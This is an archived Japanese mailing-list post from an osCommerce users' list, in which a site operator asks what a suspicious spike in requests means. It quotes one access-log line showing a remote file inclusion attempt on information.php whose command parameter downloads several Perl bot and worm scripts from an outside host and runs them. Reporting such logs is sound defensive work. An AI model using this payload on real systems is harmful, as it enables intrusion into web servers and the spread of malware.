[Tep-j-general] spy.gif ってなんでしょうか?

アーカイブの一覧に戻る

kushima michio michiok_mac****@mac*****
2004年 12月 26日 (日) 12:33:46 JST


michio です。

昨日から、異常にアクセスが増えて、調べてみたところ、
以下のように、OSCで利用するPHPへのアクセスに対して、
何か不正を働こうとしているようです。


67.19.230.106 - - [26/Dec/2004:04:02:06 +0900] "GET /information.php?tpl=http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt HTTP/1.1" 200 31573 "-" "LWP::Simple/5.800"


何か、聞くところを間違えてる気もしますが、今まで、経験が無く、
放置していいものか悩みまして、書き込みしてみました。

PHPのバージョンによっては、まずいとかそういう話なんだとは思いますが、
検索では引っかかってこなかったので、もし何か情報あれば、お教えいただけないかとおもい、
書き込んでみました。

--------------
michio





Tep-j-general メーリングリストの案内
アーカイブの一覧に戻る